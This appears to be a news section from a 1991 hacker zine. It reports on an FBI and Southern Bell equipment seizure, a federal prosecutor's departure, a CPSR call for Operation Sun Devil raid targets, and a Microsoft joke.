1. On June 12, 1991, Sirhackalot's equipment was confiscated by Southern Bell and the FBI without any charges being filed. Neither the FBI nor Southern Bell bothered to explain why they were in his home and taking his personal possessions. Again, neither party could tell Sirhackalot what he supposedly did to bring both agencies to his doorstep. Also busted were Mr.Doo and The Imortal Phreak. [Special Thanks: The Marauder (404)]

_______________________________________________________________________________

2. Bill Cook is no longer an assistant United States Attorney in Chicago.
It is unknown how he left his position. Basic questions go unanswered. Did he quit or was he fired? If he was fired, we'd like to know exactly why.

_______________________________________________________________________________

3. Wanted: Targets of Operation Sun Devil

Computer Professionals for Social Responsibility (CPSR) is pursuing a lawsuit against the Secret Service seeking the release of information concerning Operation Sun Devil. In recently filed court papers, the agency claims that the information cannot be disclosed because, among other reasons, disclosure would violate the privacy of those individuals who are the targets of the investigation. This argument can be overcome if CPSR obtains signed releases from those individuals.

CPSR is requesting the cooperation of anyone who was the subject of a Sun Devil raid on or about May 7, 1. We are prepared to enter into an attorney-client relationship with individuals responding to this request, so that confidentiality will be assured.

Please respond ASAP to:

David Sobel
CPSR Legal Counsel
(202) 544-9240
dsobel@washofc.cpsr.org

_______________________________________________________________________________

4. Recently Microsoft discovered it was the victim of trespassing. A security guard noticed two people playing volleyball on the premises and knew that they did not work for Microsoft. The officer approached the volleyball players and asked them to leave. The trespassers left.

Later someone asked the security guard how he knew that the people playing volleyball were not Microsoft employees. He replied, "They had tans." [Special Thanks: Psychotic Surfer]

_______________________________________________________________________________